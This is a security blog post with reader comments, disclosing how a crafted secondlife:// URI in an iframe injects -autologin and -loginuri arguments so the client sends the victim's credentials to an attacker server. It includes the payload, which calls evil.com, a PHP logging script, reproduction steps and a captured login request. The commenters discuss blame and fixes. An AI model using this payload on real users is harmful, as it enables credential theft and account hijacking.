IE pwns SecondLife
First of all, I must say that I am not a bug hunter. I am more on the side of tactical exploitation - you know figuring out your way through the system. I really hate using exploits and in fact, I find this approach very dull. There is no fun and value in it whatsoever. Anyway, the big news is that IE (Internet Explorer) pwns SecondLife.
Before going into details why and how it happens, I would like to bring your attention on SecondLife for a moment. For those of you who don’t follow cutting edge technologies, SecondLife is a massive virtual world located on a couple of hundred workstations on-line. The cool thing about SecondLife is that you can do all kinds of things like expressing your artistic side, communicating and of course making business. There are a lot of money into SecondLife. Not that long time ago, there was this girl who made $1000000 (a million) out of the on-line world. This means that today crooks are after your virtual persona rather then your physical self. Therefore, security in virtual worlds is almost as important as security in the physical world.
Now let’s get back to the real issue. Attackers can steal the victim’s login credentials, therefore hijacking their virtual persona, by simply tricking them into visiting a malicious Web page. Here is an example:
<iframe src='secondlife://" -autologin -loginuri "http://evil.com/sl/record-login.php'></iframe>Upon visiting the malicious page, the SecondLife client will launch and try to login automatically (-autologin) via the CGI located at http://evil.com/sl/record-login.php. At that moment, the following request is generated to the malicious CGI script. Yes, it is XML-RPC remote call:
[HTTP_RAW_POST_DATA] => <methodCall>
<methodName>login_to_simulator</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>first</name>
<value>
<string>Elm</string>
</value>
</member>
<member>
<name>last</name>
<value>
<string>Blanco</string>
</value>
</member>
<member>
<name>passwd</name>
<value>
<string>$1$[MD5 Hash of the password here]</string>
</value>
</member>
<member>
<name>start</name>
<value>
<string>last</string>
</value>
</member>
<member>
<name>version</name>
<value>
<string>1.18.2.0</string>
</value>
</member>
<member>
<name>channel</name>
<value>
<string>Second Life Release</string>
</value>
</member>
<member>
<name>platform</name>
<value>
<string>Win</string>
</value>
</member>
…
…
…
</methodCall>Notice [MD5 Hash of the password here] place holder. This is where the user password is located. The password is MD5 hashed for security reason. Well, this is definitely a good thing, although completely pointless since there are plenty of rainbow tables out there, which attackers can use to convert the hash back to normal string.
Unfortunately, I cannot construct on-line proof of concept, due to the fact that I need to expose this server to all sorts of attacks, but you can try to repeat my steps. Here is how you can do it:
- Get Apache with PHP
- Put the following script into a file called login.php:
<?php ob_start(); print_r($GLOBALS); error_log(ob_get_contents(), 0); ob_end_clean(); ?> - Tail -f the PHP error log file. Or if you don’t know what I am talking about, just skip this step.
- Make a page with the following HTML body:
<iframe src='secondlife://" -autologin -loginuri "http://localhost/login.php'></iframe> - Open the page inside Internet Explorer (both IE6 and IE7 are exploitable).
- After the SecondLife client fails to login, you will get a message within your php error log, which gives you the credentials plus some other useful info about the victim.
It is that simple. It is automatic and the user doesn’t have to do anything (no user interaction is required). I would rate this issue as Medium risk although if the victim have a lot of Linden dollars ($L) then the situation becomes quite critical. At the time of writing 1$ can be exchanged for 268.15$L.
trackbacks
- Vulnerabilidad en IE compromete a SecondLife | LKernelPanic
- Internet Explorer can be used to steal your Second Life Password « JJ Lane’s
- Internet Explorer exploit can be used to hack Second Life accounts at Daikon Forge
- » Internet Explorer Security Risk To Your Second Life - Living in the Metaverse
- Internet Explorer facilita robo de identidad en SecondLife
- King’s Corner » Blog Archive » Another reason not to save your password
- Second Life web resources for September 15th 2007 through September 17th 2007 | VintFalken.com
- Second Life News for September 18, 2007 « The Grid Live
- The Second Life Grid Grind » Blog Archive » The knock out blow? Hack allows user access to passwords.
- Internet Explorer facilita robo de identidad en SecondLife «
- Vulnérabilité de Second Life ? Attention à vos comptes ! « SecondLife Observer France- SLObserver.com
- New risk in the save password feature exposed at My Second Life
- Secondlife Talk » Sicherheitslücke in Second-Life-Client
- Second Life 1.18.2.1 Tecnolives
- Internet Explorer exploit can be used to hack Second Life accounts « Samurai Pickle
comments
pdp, don’t dare to tell “IE is exploitable”!
Don’t forget that, according to Microsoft, the problem here is Second Life trusting too much that funny trickster of the browser ;)
Very cool pdp, IMHO this is a new class of attacks.
Giorgio, really? Is that their official statement? You joker!
Petko, yes (sort of).
Didn’t you see my trackback, http://hackademix.net/2007/09/.....cond-life/ ?
comments are broken PDP.
PDP, actually this is CSRF. ^^
Actually Ronald, it’s not just CSRF. It’s URI exploitation, command argument injection, leading to CSRF and some other shadiness.
Nice work PDP, it’s good to see some others capitalizing on the URI exploitation work Rios and I have been working on. This seems very similar to our sploit against Picasa.
These issues are becoming more amusing each and every day. I think we should start classifying them with a fake acronym like “IEPWNS” as BK and the others finding these issues have been labeling their posts with such titles over at sla.ckers. But yeah this is a pretty cool vulnerability, PDP.
Very nice, it’s a mix of CSRF and a new attack vector, Tactical exploitation that’s the buzzword ;)
I really cannot understand why anybody uses IE. And especially people who are into something more than browsing of simple pages from the past century. But, according to the stats of my blog, there are SL rezidents who use IE.
dandellion Kimban, well maybe you are secure for now. With my next post, I will show you that even if you are not using IE, you are still vulnerable to IE’s problems.
pdp, please do.
It’s hard to blame either party completely for this. The real problem is this persistent idea that custom protocol handlers are a good thing. They’re not. Their whole purpose is to give remote, untrusted content command-line-ish access to the handler’s program. That’s a bad idea.
SL can blame IE for not sanitizing. IE can blame SL for respecting -autologin from a custom handler.
I blame them both. SL should never have registered a handler, and browsers should stop permitting them in general.
-Ethan
OUCH! I use Firefox, still, the ’secondlife://’ protocol is Firefox and IE compatible @.@ . And, I got Firefox to “not ask me” X.X .
So, anybody know how to reverse that tiny checkbox? X.X
Found it! Fixed and done *PHEW* :-).
It would seem to me that the blame for this lands solidly on SecondLife. Let’s count the problems:
1) Not sanity checking the results of URL handlers. (Note that MS does explain that it passes the string on to you unmodified, thus they can hardly blame IE for behaving as documented. http://msdn2.microsoft.com/en-.....67914.aspx)
2) Allowing the login information to be sent in the clear. (I notice that HTTP not HTTPS is used here.)
3) Not protecting the credentials. Since, as you note, the hash of the password is as good as the password itself, they gain no (real) benefit by passing it as opposed to raw password.
Clearly, they need to re-work their authentication frame-work.
Actually, IIRC the hash of the password isn’t quite as good as the password itself. The hash is sufficient to log into the Second Life grid and steal the victim’s L$, but it isn’t sufficient to log in to secondlife.com. In particular, I think changing a user’s password or e-mail address can’t be done using just the hash.
Fortunately, there’s a workaround for this vulnerability - disable saved passwords and enter your password by hand each time you login. (Oh, and be wary of secondlife:// links.)
Also, in this case there’s a good reason for the URL handler - it’s used for linking from websites to locations inworld. Not essential, but definitely nice to have.
Oh, and normally the login information is sent over https - it’s just that the command-line option to select where to login accepts non-https URLs. (There are times when it’s useful to be able to login to somewhere else - for example, the OpenSim project.)
Hi, I did some testing :
- On windows, I’ve retrieved the exact same credentials by accessing the page in both IE and FF, making both exploitable.
- On Mac OS however, the URL is taken as a map location, the hack doesn’t occur, it might if you change the URL syntax for the Mac client.
I’ve produced a binary patch for the current windows viewer which disables the -loginuri feature and so should prevent the exploit working.
I’ve attached this patch to the JIRA entry for this bug. If you don’t want to wait for the update from Linden, this should corect the issue:
http://jira.secondlife.com/browse/VWR-2508
pdp, nice one!
It’s nice URI exploitation, CSRF and Information leakage vulnerabilities joint into one attack.
Yes, IE help to pwns SecondLife ;-). And MS will not take any responsibility for their IE “URI feature” :-), so SL need to fix it in their software. Like all others vendors which products are vulnerable to URI exploitation holes.
Nathan and Rios work a lot in case of URI exploitation and command argument injection, and pdp make his contribution. It is new attack surface guys. So every user of SecondLife (and any other software with its own url-handlers) need to attend to security (especially if they use IE). Waiting for new URI-exploit holes.